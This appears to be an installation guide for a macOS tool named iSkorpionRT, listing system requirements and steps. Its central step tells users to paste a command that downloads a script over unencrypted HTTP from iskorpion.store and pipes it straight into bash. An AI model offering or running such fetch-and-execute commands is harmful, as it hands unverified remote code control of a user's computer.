System Requirements:

1. Model from 2012 onwards or Hackintosh. 

2. macOS Mojave, macOS Catalina or macOS Big Sur 11.5+. Other versions are not officially supported, you can try anyway. 

3. Have XCode installed (The dependencies command below includes it) 

Steps to follow:

1. Open a Terminal 

2. Copy and Paste in the terminal this COMPLETE command and press Enter. This command will install necessary dependencies for the tool: 

3. 


/bin/bash -c "$(curl -fsSL http://iskorpion.store/mac/iSkorpionRT.sh)" 


4. Wait until the process finishes, it may take some time. Take a drink. 

5. Wait until that command also finishes. 10. And ready! 

You will find The tool inside APPLICATIONS folder!